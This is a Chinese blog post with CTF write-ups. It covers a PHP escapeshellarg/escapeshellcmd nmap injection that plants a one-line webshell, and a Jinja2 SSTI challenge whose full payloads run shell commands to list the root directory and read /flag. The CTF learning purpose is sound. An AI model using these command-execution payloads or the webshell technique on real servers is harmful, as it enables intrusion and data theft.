被监督写博客-Day3

最新推荐文章于 2022-11-28 16:26:21 发布
最新推荐文章于 2022-11-28 16:26:21 发布
阅读量157 收藏
点赞数
分类专栏: 日常学习小记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/108936382
版权

nmap命令中的-oG命令可以将命令和结果写入文件。

题目:[BUUCTF 2018]Online Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

代码审计:get方式上传host变量,先给字符串加一个单引号然后再进行转义
escapeshellarg函数:给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,以确保能够直接将一个字符串传入 shell 函数(也就是在单引号前面加一个’’,再用一对单引号将两部分连接)

escapeshellcmd函数:对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。(对\以及最后的没配对的引号转义)
昂 通过nmap的-oG命令实现输入可控,想到上传文件,进而想到上传一句话木马文件(反正我是想不到。。。)不过这咋利用了上面的函数,我只明白了将两部分连接起来。。。是后面又进行了转义然后单引号就没有了?
payload:
在这里插入图片描述
在这里插入图片描述
说明将hack.php上传到了这个文件中;

(蚁剑的使用注意密码的问题,太久没用忘记了上传的变量就是连接密码。)
在根目录下找到flag
在这里插入图片描述

复习了php的几个函数:
strrev():反转字符串;
trim():去除字符串两边的空白字符或其他预定义字符;
invtal():获取变量的整数值。

题目二:[BJDCTF 2nd]fake google
ssti注入
访问根目录

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

查看flag

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}
piubiutiu~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Power PMAC 5-Day Training
05-18
Day 3 (Beginner Class Part 3) * 运动程序:Power PMAC支持多种运动程序,包括线性运动、圆弧运动、螺旋运动等。 * 移动模式:Power PMAC支持多种移动模式,包括点对点运动、直线运动、圆弧运动等。 * 数据采集:...
react-day-picker:React的轻量级日期选择器组件
02-03
npm install react-day-picker import DayPicker from " react-day-picker " ; import " react-day-picker/lib/style.css " ; export default function Hello () { return ; } 文献资料 在卡住? v8即将到来! 下...
c++使用netsh命令_Go语言 - 调用系统命令
weixin_42499530的博客
12-04 132
简介执行系统命令是一个很重要的操作,直接调用系统命令,减少造轮子的时间。golang执行命令的包:os/exec查找命令的绝对路径cmdPath , err := exec.LookPath("ls")if err !=nil{fmt.Println(err)}fmt.Println(cmdPath)创建命令对象func Commandfunc Command(name string, arg ....
深入理解linux系统下proc文件系统内容
技术资料库
04-01 4998
作者:佚名   来源:互联网内容摘要:Linux系统上的/proc目录是一种文件系统,即proc文件系统。 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其
installshield调取cmd.exe运行指令的
lixiuzhu0的专栏
01-26 3900
1.达到目的: 在installshield中达成调用cmd.exe执行某种指令,比如删除一个服务,需要通过cmd,exe执行sc delete ServiceName 2.实现函数 : LaunchAppAndWait ("","sc delete ServiceName",LAAW_OPTION_HIDDEN); LaunchAppAndWait ("cmd.exe","sc dele
tcl 中的proc 函数
qq_34110120的博客
03-04 5849
proc get_area {args} { parse_proc_arguments -args $args opt set pattern "" if {[info exists opt(-pattern) ]} { set pattern $opt(-pattern) } set area 0 foreach_in_collection c [get_flat_cell *${pattern}*] { set area [expr [get_attribut.
TCL--proc
ppju
04-03 195
[code="tcl"] 1. proc name argList body proc plus {a b} { expr $a + $b } "plus" is a common tcl command. 2. global variable: global x y scope variable namespace...
vue2-day3.zip
08-10
在"vue2-day3.zip"这个压缩包中,我们很可能看到的是关于Vue 2.x版本的第三天学习资料,这可能包括教程、代码示例或者项目实践等内容。Vue 2.x是Vue.js的一个重要版本,它引入了许多改进和优化,使得开发更加高效和...
03-python-day3.md
10-25
03-python-day3.md
RHCSA-DAY3
09-23
Red Hat Certificated System Administrator (RHCSA) of RHEL 7, this is lesson three.
InstallShield——执行CMD中的命令示例
gnefniu的专栏
11-30 2493
执行CMD中的命令示例:     szParam = "/c mysql -uroot -proot -e \"source "+SUPPORTDIR^"data.sql"+"\"";       MessageBox (szParam,INFORMATION);          if (LaunchAppAndWait ("cmd", szParam, WAIT)
TCL proc 子函数调用
qq_34110120的博客
12-02 6721
TCL里的过程,等效于C语言里的函数(function) 一个标准的proc一般具有如下的特点 proc proc_name {argument} { ...... return return_value } 1 2 3 4 在使用的时候,直接输入过程名即可执行。 先来看一个下面的例子, 这是一个标准的过程,get_area就是这个过程名,直接执行它就可以了,这个过程名的...
Tcl -- proc
dongyanxia1000的专栏
02-18 1万+
Tcl--Proc(procedure 的简称) TCL支持过程的定义和调用,在TCL中,过程可看作是用TCL脚本实现的命令,效果与TCL的固有命令相似。 TCL中的过程类似于C中的函数。 % proc add {x y}{expr $x+$y} 参数一:add    过程名 参数二:{x y}   过程的参数列表,参数之间用空格隔开。 参数三:{expr $x+$y} TCL脚本,过
tcl语法和后端脚本实践 - 3:过程(proc)和过程定义(define_proc_attributes)
i_chip_backend的博客
03-26 1万+
强大的proc一定要会用
tcl脚本学习十:proc 子函数的使用
weixin_30530939的博客
08-02 1747
lesson 10 :proc 子函数的使用 1. proc sum {arg1 arg2} { set x [expr $arg1+$arg2]; return $x } puts " The sum of 2 + 3 is: [sum 2 3]\n\n" //[语法] :proc procName { var1 var2 ... } {body}说明:1. proc 命令有三个参...
Linux proc 命令 快速浏览
zuihaobushi的专栏
05-16 638
buddyinfo Linux /proc 下面记录着系统最重要的信息,观察这些文件是调试系统重要的手段.下面简要说明这些文件的作用. 大多数文件可以通过 cat 获取里面的参数.例如  cat cpuinfo  processor       : 0 vendor_id       : GenuineIntel model           : 94 model nam
tcl proc
zya1314125的博客
11-28 1325
tcl proc
关于Linux下Proc命令不能运行的问题
sunshine7758的专栏
08-25 1742
最近在Linux下学习Pro*c编程,有一个初学者容易碰到的问题就是Proc命令无法执行,解决办法如下:在.bash_profile 文件中加入 LD_LIBRARY_PATH=$ORACLE_HOME/lib;export LD_LIBRARY_PATH就ok了。
cat /proc/meminfo 各字段详解
热门推荐
JustDoIt_201603的博客
06-08 2万+
一、cat /proc/meminfo 各字段详解 / $ cat /proc/meminfo MemTotal: 877368 kB :所有可用RAM大小(即物理内存减去一些预留位和内核的二进制代码大小)(HighTotal + LowTotal),系统从加电开始到引导完成,BIOS等要保留一些内存,内核要保留一些内存,最后剩下可供系统支配的内存就是MemTotal。这个值在系统运行期间一般是固定不变的。 MemFree: 22516 kB :LowFree与H
day--和--day区别
最新发布
04-18
"day--"和"day"是两种不同的操作符,它们在编程中有着不同的含义和用法。 1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值